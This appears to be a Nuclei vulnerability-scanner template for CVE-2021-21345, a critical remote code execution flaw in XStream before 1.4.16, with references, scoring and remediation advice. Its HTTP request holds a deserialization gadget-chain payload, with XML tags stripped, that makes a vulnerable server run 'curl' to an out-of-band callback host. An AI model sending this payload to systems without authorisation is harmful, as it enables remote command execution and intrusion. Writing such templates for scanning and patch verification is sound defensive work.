id: CVE-2021-21345 info: name: XStream <1.4.16 - Remote Code Execution author: pwnhxl,vicrack severity: critical description: | XStream before 1.4.16 is susceptible to remote code execution. An attacker who has sufficient rights can execute host commands via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. reference: - https://x-stream.github.io/CVE-2021-21345.html - http://x-stream.github.io/changes.html#1.4.16 - https://github.com/x-stream/xstream/security/advisories/GHSA-hwpc-8xqv-jvj4 - https://nvd.nist.gov/vuln/detail/CVE-2021-21345 - https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.9 cve-id: CVE-2021-21345 cwe-id: CWE-78,CWE-502 epss-score: 0.48389 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream tags: cve,cve2021,xstream,deserialization,rce,oast http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml 2 com.sun.corba.se.impl.activation.ServerTableEntry com.sun.corba.se.impl.activation.ServerTableEntry verify true 1 UTF-8 curl http://{{interactsh-url}} 3 javax.xml.ws.binding.attachments.inbound javax.xml.ws.binding.attachments.inbound matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "User-Agent: curl"